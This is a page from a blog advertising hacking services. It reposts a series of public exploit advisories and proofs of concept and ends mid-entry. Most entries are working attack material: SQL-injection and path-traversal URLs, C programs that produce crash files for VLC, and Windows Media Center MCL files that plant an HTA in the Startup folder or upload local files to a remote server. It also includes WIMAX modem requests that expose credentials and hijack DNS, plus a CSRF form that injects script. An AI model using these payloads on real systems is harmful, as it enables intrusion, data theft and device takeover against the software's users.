Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863228280

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/64572/info

CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CMS Afroditi 1.0 is vulnerable. 

http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1
HireHackking 
source: https://www.securityfocus.com/bid/64587/info

The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
HireHackking 
source: https://www.securityfocus.com/bid/64619/info

xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

xBoard 5.0, 5.5, and 6.0 are vulnerable. 

http://www.example.com/xboard/view.php?post=[LFI]
HireHackking 
// source: https://www.securityfocus.com/bid/64623/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main()
{
	FILE *f;
	f = fopen("dos.nsv", "w");
	fputs("\x4e\x53\x56\x66", f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

//use code for creating malicious file

edit:  works on 2.0.1.0
HireHackking 
# Title : GoAutoDial CE 3.3 Multiple SQL injections, Command Injection
# Date : 06/12/2015
# Author : R-73eN
# Tested on : goautodial-32bit-ce-3.3-final
# Software : http://goautodial.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#

Vulnerabilities

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

call_report_export.php

Line 131

$LOGip = getenv("REMOTE_ADDR");
$LOGbrowser = getenv("HTTP_USER_AGENT");
$LOGscript_name = getenv("SCRIPT_NAME");
$LOGserver_name = getenv("SERVER_NAME");
$LOGserver_port = getenv("SERVER_PORT");
$LOGrequest_uri = getenv("REQUEST_URI");
$LOGhttp_referer = getenv("HTTP_REFERER");
if (preg_match("/443/i",$LOGserver_port)) {$HTTPprotocol = 'https://';}
  else {$HTTPprotocol = 'http://';}
if (($LOGserver_port == '80') or ($LOGserver_port == '443') ) {$LOGserver_port='';}
else {$LOGserver_port = ":$LOGserver_port";}
$LOGfull_url = "$HTTPprotocol$LOGserver_name$LOGserver_port$LOGrequest_uri";

$stmt="INSERT INTO vicidial_report_log set event_date=NOW(), user='$PHP_AUTH_USER', ip_address='$LOGip', report_name='$report_name', browser='$LOGbrowser', referer='$LOGhttp_referer', notes='$LOGserver_name:$LOGserver_port $LOGscript_name |$campaign[0], $query_date, $end_date|', url='$LOGfull_url';";


The $LOGip , $LOGbrowser etc are not sanitized are passed directly to a sql query.
For example passing  a crafted User-Agent header  will cause a sql injection attack.

The following files were vulnerable for the same vulnerability.
call_report_export.php
voice_lab.php
user_status.php
user_stats.php
timeclock_status.php
timeclock_report.php
sph_report.php
group_hourly_stats.php
realtime_report.php
lead_report_export.php
list_download.php
fcstats.php
call_report_export.php
AST_VICIDIAL_ingrouplist.php
AST_VICIDIAL_hopperlist.php
AST_usergroup_login_report.php
AST_team_performance_detail.php
AST_VDADstats.php
AST_server_performance.php
campaign_debug.php
AST_LIST_UPDATEstats.php
AST_LISTS_campaign_stats.php
AST_OUTBOUNDsummary_interval.php
AST_IVRstats.php
AST_IVRfilter.php
AST_inbound_daily_report.php
and in many other files.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

web_form_forward.php
Line 15

if (isset($_GET["user"])) {$user=$_GET["user"];}

require("dbconnect.php");
$stmt="SELECT full_name from vicidial_users where user='$user';";
$rslt=mysql_query($stmt, $link);
$row=mysql_fetch_row($rslt);

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

QM_live_monitor.php

If the QueueMetrics is enabled the following file is vulnerable to sql injection

. LINE 31
if (isset($_GET["call"])){$call=$_GET["call"];}
elseif (isset($_POST["call"]))	{$call=$_POST["call"];}
.
.
.
$stmt = "SELECT user,server_ip,conf_exten,comments FROM vicidial_live_agents where callerid='$call';";


As u can see the $call parameter is not sanitized which leads to Sql injection.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


call_log_display.php SQL injection


there is no validation on the $server_ip and $session_name an
if( (strlen($server_ip)<6) or (!isset($server_ip)) or ( (strlen($session_name)<12) or (!isset($session_name)) ) )
.
.
$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
.
.
The if statement can be bypassed very easily, we need to provide an input more then 6 characters and more then 12 characters.
Then the parameters get passed ot the sql query and we have sql injection again.

The same vulnerability was found to.

conf_extn_check.php
inbound_popup.php
live_extn_check.php
manager_send.php
park_calls_display.php
active_list_refresh.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


SCRIPT_multirecording_AJAX.php SQL injection

.
.
.
if (isset($_GET["campaign"]))	{$campaign=$_GET["campaign"];}
	elseif (isset($_POST["campaign"]))	{$campaign=$_POST["campaign"];}
.
.
.
$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";

Again $campaign is not sanetized


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


recording_lookup.php SQL injection
.
.
(isset($_GET["QUERY_recid"]))		{$QUERY_recid=$_GET["QUERY_recid"];}
elseif (isset($_POST["QUERY_recid"]))	{$QUERY_recid=$_POST["QUERY_recid"];}
.
.
$stmt="select recording_id,lead_id,user,filename,location,start_time,length_in_sec from recording_log where filename LIKE \"%$QUERY_recid%\" order by recording_id desc LIMIT 1;";
$QUERY_recid is not sanitized.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


vicidial_sales_viewer.php SQL injection , Command Injection
the $dcampaign parameter is not sanitized.

.
.
if (isset($_GET["dcampaign"]))				{$dcampaign=$_GET["dcampaign"];}
elseif (isset($_POST["dcampaign"]))			{$dcampaign=$_POST["dcampaign"];}
.
.
$stmt="select campaign_id, campaign_name from vicidial_campaigns where campaign_id='$dcampaign'"; // Here we have the sql injection
.
.
passthru("$WeBServeRRooT/vicidial/spreadsheet_sales_viewer.pl $list_ids $sales_number $timestamp $forc $now $dcampaign"); // Command injection



https://www.infogen.al/ - Infogen AL
HireHackking 
// source: https://www.securityfocus.com/bid/64626/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .eac3 DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main(int argc, char *argv[])
{
	FILE *f;
	f = fopen(argv[1], "r+");
	fseek(f, 5, SEEK_SET);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

//code updates eac3 file, can find samples on videolan ftp server
HireHackking 
source: https://www.securityfocus.com/bid/64693/info

SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.

SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected. 

https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg
HireHackking 
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)

Software Vendor: Microsoft

Software version : MS Windows Media Center latest version on any Windows OS.

Software Vendor Homepage: http://www.microsoft.com

CVE: CVE-2015-6131

Exploit Author: Eduardo Braun Prado

Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team

date: december 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files.


exploit code below:

----------- self-exec-1.mcl ------------------------------------

<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>

------------------------------------------------------------

----------self-exec-2.mcl--------------------------------------

<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------

-----Create-recordsetfile.hta --------------

<html><body onload="aa()">

<script language="VBScript">

function aa()


defdir="."

alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". 




Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close

end function
</script></body></html>

-------------------------------------------------------------------------------


---------recordsetdata.txt------------------------------------------

<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
HireHackking 
1. Advisory Information

Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

 

3. Vulnerability Description

The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.

A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages

Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file.

The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server.

Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.

7.1. Proof of Concept

A new file should be created with the name "poc-microsoft.mcl" and with the following content:

 
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">

    function do_upload(fname, data){
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
        xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
        xmlhttp.setRequestHeader("Connection", "close");
        xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
        xmlhttp.send(new Uint8Array(data));
    }


    function read_local_file(filename){
        /* Must use this one, XMLHttpRequest() doesn't allow to read local files */
        var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlhttp.open("GET", filename, false);
        xmlhttp.send();
        return xmlhttp.responseBody.toArray();
    }


    function upload_file(filename){
        try{
            do_upload(filename, read_local_file(filename));
        }catch(e){
            alert(filename + " error: " + e);
        }
    }


    upload_file("file:///C:/Windows/System32/calc.exe");

</script>
</body>
</html>

</application>
     
 

8. Report Timeline

2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.
9. References

[1] http://www.microsoft.com/. 
[2] https://technet.microsoft.com/library/security/MS15-134.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
HireHackking 
### Exploit Title: WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.greenpacket.com
### Version: v2.10.14-g1.5.2
### Tested on: Kali-Linux

I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.  

### Details of LX350P model:
Device Information:
Hardware model:	WIXFMR-108
Firmware version:	v2.10.14-g1.5.2-mobinnet
Firmware version:	v2.10.14-g1.5.2
Firmware creation date:	Mon Aug 15 16:45:58 2013
Frequency range:	3300000KHz~3600000KHz
Serial number:	DXHKC120702523

I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition     2)wget      3)Nmap


### POCs of the modem:
#Get wimax credentials>>
wget -c "http://server/ajax.cgi?action=tag_init_wimax_auth.php"

#Enable and Change DMZ_Host IP in Firewall(request manipulating with BurpSuie)>>
POST /ajax.cgi?action=net_firewall HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_firewall.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
NETFILTER_FW_IPFILTER=&MGMT_WEB_WAN=on&MGMT_TELNET_WAN=on&NETFILTER_DMZ_HOST=8.8.8.8&btnSubmit=1

#Ping a system: (We can use from below query for launching (D)DOS attacks>> 
http://server/ajax.cgi?action=tag_ipPing&pip=4.2.2.4&cache=false
http://server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
http:/server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false

#Get info about WAN MAC, LAN MAC, DHCP + ... >>
http://server/ajax.cgi?action=tag_init_net_dhcp.php&cache=false

#Change the DNS IP Addresses (DNS Hijacking, Spoofing)>>
POST /ajax.cgi?action=net_dhcp HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_dhcp.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 945
DHCPD_STATIC_LEASE=&DHCPD_ENABLE=1&DHCPD_START_IP_01=192&DHCPD_START_IP_02=168&DHCPD_START_IP_03=1&DHCPD_START_IP_04=2&DHCPD_START_IP=192.168.1.2&DHCPD_END_IP_01=192&DHCPD_END_IP_02=168&DHCPD_END_IP_03=1&DHCPD_END_IP_04=200&DHCPD_END_IP=192.168.1.200&dns_type_1=2&DNS_IP_1_01=6&DNS_IP_1_02=6&DNS_IP_1_03=6&DNS_IP_1_04=6&DNS_IP_1=6.6.6.6&dns_type_2=2&DNS_IP_2_01=8&DNS_IP_2_02=8&DNS_IP_2_03=8&DNS_IP_2_04=8&DNS_IP_2=8.8.8.8&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=2%2C6.6.6.6+2%2C8.8.8.8+1%2C0.0.0.0&ippt_enable=0&Active_0=Y&Interface_0=1&Protocol_0=1&SrcPort_0=68&DestPort_0=67&Comment_0=DHCP+request+from+lan&Active_1=Y&Interface_1=2&Protocol_1=1&SrcPort_1=67&DestPort_1=68&Comment_1=DHCP+response+from+wan&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2

#Frame Injection>>
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false&time=1449547319726  
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&time=3  
 

### Conclusion: 
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)An attacker might use "Frame Injection" to redirect users to other malicious websites that are used for phishing and similar attacks.
4)To obtain the control of similar modem(LX350P) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).  


At the end, I am thankful and I wait for your response.
HireHackking 
### Exploit Title: WIMAX MT711x - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.seowonintech.co.kr/en/
### Version: V_3_11_14_9_CPE
### Tested on: Kali-Linux

I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.  

### Details of MT711x model:
Version Information:
Build Time 	 2014.08.18-11:49
CPE Ver 	 1.0.9
MTK FW Ver 	 EX_REL_MT711x_V_3_11_14_9_CPE
Serial Number 	 IRMB1351C9200-0001044

I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition     2)wget      3)Nmap


### POCs of the modem:
#Get the WIFI settings>>
wget -c "http://server/cgi-bin/multi_wifi.cgi"

#Get Wimax credentials>>
wget -c "http://server/cgi-bin/wccm_wimax_setting.cgi"

#Enable and Disable connections to modem (as default those are ENABLED)>>
http://server/cgi-bin/remote.cgi


#Ping a system (useful for launching (D)DOS attack)>>
POST /cgi-bin/diagnostic.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/diagnostic.cgi
Cookie: login=; login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
select_mode_ping=on&ping_ipaddr=4.2.2.4&ping_count=10&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&trace_report_only_hidden=0&action=Apply&html_view=ping

#Change the password of ADMIN account:
POST /cgi-bin/pw.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/pw.cgi
Cookie: login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
isp_name=mobinnet&pw_set_select=admin&passPass=admin&passCfirm=admin&action=Apply


### Conclusion: 
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)To obtain the control of similar modem(MT711x) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).  


At the end, I am thankful and I wait for your response.
HireHackking 
Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF
Exploit Author : Ahn Sung Jun
Date : 2015-12-09
Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/
Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip
Version : 1.1.3
Tested On : kail linux Iceweasel

===========================================
Vulnerable Code : wp_easy_poll.php
if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
		global $wpdb;
		$pc = new poll_class;
		
		/* Line 859 */
		$insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
		
		$wpdb->insert( $wpdb->prefix.$pc->table, $insert );
		$new_poll_id = $wpdb->insert_id;
		
		$p_anss = $_REQUEST['p_anss'];
		if(is_array($p_anss) and $new_poll_id){
			foreach($p_anss as $key => $value){
				if($value != ''){
					$insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
					$wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
				}
			}
		}

===========================================
POC (XSS & CSRF)
<html>
	<body onload="javascript:document.forms[0].submit()">
	<form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
	<input type="hidden" name="action" value="p_add" />
	<input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
	<input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
	<input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
	<input type="submit" name="submit" value="Submit" class="button" />
	</form>
</html>

===========================================
Secure Coding
if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
		global $wpdb;
		$pc = new poll_class;

		/* Secure Coding */
            $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']);
			$_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']);
			$_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']);

		$insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
		
		$wpdb->insert( $wpdb->prefix.$pc->table, $insert );
		$new_poll_id = $wpdb->insert_id;
		
		$p_anss = $_REQUEST['p_anss'];
		if(is_array($p_anss) and $new_poll_id){
			foreach($p_anss as $key => $value){
				if($value != ''){
					$insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
					$wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
				}
			}
		}
HireHackking 
<!doctype html>
<html>
	<head>
		<meta http-equiv='Cache-Control' content='no-cache'/>
		<title>IE11 11.0.9600.18097 NULL PTR</title>
		<script>
    
      /*
       * Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR
       * Date: 09.12.2015
       * Exploit Author: Marcin Ressel 
       * Vendor Homepage: www.microsoft.com
       * Software Link: 0
       * Version: 11.0.9600.18097
       * Tested on: Windows 7 x64 
       * https://twitter.com/m_ressel
      */
      var trg,src,arg;

			function tk() {

                targetDomTree = document.getElementsByTagName("*");
		
                var meta = document.createElement('meta');
                    meta.setAttribute("http-equiv", "X-UA-Compatible");
                    meta.setAttribute("content",'IE=10');
            
                document.getElementsByTagName("head")[0].appendChild(meta);
               
                doc = document;
                
                src = targetDomTree[8]; 
				        trg = targetDomTree[1]; 
				        arg = targetDomTree[0];  
        
				        arg.addEventListener("DOMNodeRemoved",new Function("",
                                                                   'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+
                                                                   'try{trg = arg.removeNode(true);}catch(err){}'+
                                                                   'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+
                                                                   'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+
                                                                   'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+
                                                                   'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+
                                                                   'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+
                                                                   'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}'
                                                                  ),
                                                                  true); 

				        trg.outerText = new Object(); 
				        trg.parentNode.appendChild(document.createElement("div")); 
			}
		</script>
	</head>
	<body onload='tk();'>
	<div id="out">..</div>
  <div id="oneUnArg">...</div>
  <div id="pHolder"></div>	
	</body>
</html>
HireHackking 
MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow
Credit: Maksymilian Arciemowicz ( CXSECURITY )
Website: 
http://cxsecurity.com/
http://cert.cx/


Affected software:
